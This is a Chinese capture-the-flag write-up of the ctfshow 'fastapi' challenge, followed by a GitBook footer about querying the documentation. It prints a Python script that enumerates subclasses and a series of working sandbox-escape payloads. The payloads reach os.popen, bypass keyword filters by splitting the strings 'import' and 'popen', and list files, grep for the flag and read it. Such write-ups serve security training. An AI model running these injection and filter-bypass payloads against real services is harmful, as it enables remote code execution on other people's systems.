# fastapi

* 快速：非常高的性能，与 NodeJS 和 Go 相当
* 快速编码：将功能开发速度提高约 200％ 至 300％
* 更少的错误：减少约 40％ 的人为错误
* 直观：强大的编辑器支持，自动补全无处不在，调试时间更少
* 简易：旨在易于使用和学习，减少阅读文档的时间。
* 简短：减少代码重复。
* 稳健：获取可用于生产环境的代码，具有自动交互式文档
* 基于标准：基于并完全兼容 API 的开放标准 OpenAPI 和 JSON Schema

发现存在/docs文档，可以与/ccca1ccc进行交互。

由于是python，第一时间考虑的是SSTI模板注入，但是使用网上的payload都是返回空字符串或者报错。

使用`str()`切片显示，发现可以：

```
str([].__class__.__base__.__subclasses__())[1:]
```

返回Object的所有子类

<figure><img src="/files/xbgHRubkXmCCnDUdjQ6M" alt=""><figcaption></figcaption></figure>

查找`warnings.catch_warnings`下标并返回(参考[Lazzaro](https://lazzzaro.github.io/2020/10/25/match-CTFshow-1024%E6%9D%AF/))：

```python
import requests

url = 'http://0036be1d-d998-420a-bdef-421987f9eb43.chall.ctf.show/cccalccc'
for i in range(500):
    data = {'q': 'str([].__class__.__base__.__subclasses__()[' + str(i) + '])[1:]'}
    r = requests.post(url, data)
    if r.text.find("warnings.catch_warnings") != -1:
        print(i)
        print(r.text)

```

![](/files/PEYv9Ps4ruGHopAG0HQC)

payload：

```
[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__import__']('os').system('ls')
```

发现过滤，fuzz后发现system和import被过滤，import可以用字符串拼接绕过，system换成popen：

```
str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['po'+'pen']('ls').read())[1:]
```

啥也没有，利用grep查找一下关键字：

```
[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('find /app | xargs grep flag').read()
```

读取flag:

```
[].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']('os').__dict__['pop'+'en']('cat /mnt/f1a9').read()
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2020/2020-ctfshow-1024-bei/fastapi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.